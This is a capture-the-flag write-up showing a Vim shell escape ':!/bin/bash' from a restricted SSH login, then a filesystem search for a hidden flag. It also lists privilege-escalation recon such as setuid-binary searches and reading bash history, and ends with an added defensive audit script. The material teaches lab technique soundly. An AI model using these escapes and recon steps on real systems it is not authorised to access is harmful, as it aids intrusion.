We were given the following instructions:
ssh -l luser gordo.smpctf.com -p 2282
Password: smpctf
Help find waldo..
Once logged in over SSH, we land in Vim. Again, thanks to defcon trivial 200, we know what to do:
:set shell=/bin/bash
:!/bin/bash
Then we have a shell:
bash-3.1$ id
uid=1005(luser) gid=103(levels) groups=103(levels)
From here, it's just exploration. We can start by using find:
bash-3.1$ find / -iname '*flag*' 2>/dev/null
[...]
/usr/lib/.flag
[...]
Hmm, what's this?
bash-3.1$ ls -l /usr/lib/.flag
drwxr-xr-x 2 root root 4096 Jul 9 12:30 /usr/lib/.flag
bash-3.1$ cd /usr/lib/.flag
bash-3.1$ ls -al
total 64
drwxr-xr-x 2 root root 4096 Jul 9 12:30 .
drwxr-xr-x 69 root root 53248 Jul 9 12:30 ..
-rw-r--r-- 1 root root 54 Jul 9 16:33 smp
bash-3.1$ cat smp
Challenge Key: cfc6adcc
Flag: HAHAHAHAHAHAHHAHAponies
Got it!
If we hadn't found it this way, in such a situation we could have used:
- recursive grep:
grep -Hirn flag /
- find setuid/setgid binaries for privilege escalation:
find / -local -type f \( -perm -4000 -o -perm -2000 \) -exec ls -l '{}' \;
- see files that were last modified on the filesystem:
ls -alRt / |head
- reading ~/.bash_history and other history or log files
- up to your imagination :)
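The same sweeps, turned around as an audit an administrator can run over a tree they own. This is an added example, not part of the original writeup; `audit_tree` and `build_sample_tree` are names made up here, and the sample tree is constructed to mirror the layout seen above.

```shell
#!/bin/sh
# audit_tree ROOT prints one tagged, sorted line per finding:
#   HIDDEN <path>  dot-prefixed file or directory (like /usr/lib/.flag)
#   SETID  <path>  regular file with the setuid or setgid bit set
#   NAME   <path>  entry whose name contains "flag", case-insensitive
audit_tree() {
    root=${1:-/}
    {
        # -xdev stays on one filesystem; -mindepth 1 skips ROOT itself.
        find "$root" -xdev -mindepth 1 -name '.*' 2>/dev/null |
            sed 's/^/HIDDEN /'
        find "$root" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null |
            sed 's/^/SETID /'
        find "$root" -xdev -mindepth 1 -iname '*flag*' 2>/dev/null |
            sed 's/^/NAME /'
    } | sort
}

# Constructed sample tree (assumption: layout modelled on the writeup,
# contents are placeholders). Prints the temporary root it created.
build_sample_tree() {
    d=$(mktemp -d) || return 1
    mkdir -p "$d/usr/lib/.flag" "$d/usr/bin" "$d/home/luser"
    printf 'constructed sample, not a real key\n' > "$d/usr/lib/.flag/smp"
    printf '#!/bin/sh\n' > "$d/usr/bin/helper"
    chmod 4755 "$d/usr/bin/helper"      # set the bit after writing the file
    : > "$d/home/luser/notes.txt"       # ordinary file, must not be reported
    printf '%s\n' "$d"
}
```

Anything tagged HIDDEN under a system directory, or SETID outside the distribution's known list, is worth comparing against the package manager's file database.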